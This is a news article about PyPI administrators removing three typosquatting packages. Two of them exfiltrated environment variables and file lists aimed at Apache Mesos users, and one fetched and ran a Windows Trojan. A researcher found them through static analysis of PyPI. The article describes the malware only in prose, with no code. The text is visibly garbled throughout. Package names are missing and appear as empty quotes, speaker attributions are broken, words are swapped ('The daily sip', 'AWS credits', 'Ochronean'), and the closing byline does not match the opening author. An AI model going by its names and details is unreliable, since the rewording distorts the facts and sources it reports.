PyPI admins remove three malicious packages after more than 10,000 downloads

Adam Bannister December 14, 2021 at 16:09 UTC

Updated: December 15, 2021 at 08:04 UTC

Two parcels remained unknown for 10 months

UPDATE The Python Package Index (PyPI) removed malware and data-stealing deployment packages that have collectively been downloaded thousands of times.

The trio of malicious packages tricked unsuspecting users into typosquatting the names of legitimate packages.

‘Good reputation’

In the case of two packages that exfiltrated data from compromised systems, the number of downloads was also potentially inflated by the way the authors deceptively bolstered their credibility.

“Both of these packages included their source code URL as an existing popular library, so anyone accessing the package in PyPI or analyzing the popularity of the library would see a lot of GitHub stars and forks, indicating a good reputation,” Andrew said. Scott, product manager at Palo Alto and maintainer of the Python security project Ochrona Security, in a medium blog post.

Uploaded by the same user, both packages – ” and ” – seemed to target users of Apache Mesos, which is used to manage computer clusters.

Keep up to date with the latest news on software supply chain attacks

They were uploaded to PyPI in February 2021, after which they have been downloaded over 10,000 times, including over 600 downloads in the last month alone.

Scott thanked the Python security team for removing the packages promptly on December 13, the same day he notified them.

A third Trojan smuggling package dubbed ” saw around 600 downloads between appearing on PyPI on December 1 and being removed when PyPI administrators were alerted on December 10.

“I believe aws-login0tool was intended to confuse users of a tool called aws-login-tool which no longer exists on PyPI, but is on some older mirrors,” Scott said. The daily sip.

“The dpp-client packages I have to assume are maybe [intended to imitate] an internal component of some sort of data processing pipeline tool, but I haven’t been able to confirm this. »

Malicious operations

All three packages were identified as potentially malicious through the import chain, “because it is commonly used to exfiltrate data or download malicious files,” Scott said.

The data-stealing pair gathered environment variables and file lists, apparently looking for files related to Apache Mesos, and relayed them “to an unknown web service”.

They performed a standard package installation, before grabbing a file “from any domain” and attempting to execute the file, a known Windows Trojan.

“It’s hard to know what the impact would be,” Scott said. “The Trojan package would only be limited to malware capabilities and data extraction will really depend on your environment – but I could definitely see it harvesting things like AWS credits and other API keys. I’m less secure about Mesos-specific information that is stored in targeted directories.

Python poll

The results emerged from a static analysis of around 200,000 PyPI packages – nearly two-thirds of the total – after downloading them with Bandersnatch.

He extracted the packages by creating “a fairly simple Python script to recursively loop through Bandersnatch’s somewhat complicated folder structure, then unzip and extract each sdist, egg, or wheel into a flat directory.

“Once extracted, I ran a number of string and regular expression searches using grep, then manually reviewed the results,” Scott said.

This technique also revealed a minor vulnerability in an open source package developed by a commercial vendor.

Scott said Ochronean open source software composition analysis tool, can help developers if they are using a mirror or want to check if packages are present in their project.

It also intends to update and refine its package analysis and will release additional results later.

This article was updated with additional commentary from Andrew Scott on December 14

DON’T FORGET TO READ ‘Log4Shell’ vulnerability poses a critical threat to applications using the ‘ubiquitous’ Apache Log4j Java logging package

Sam D. Gomez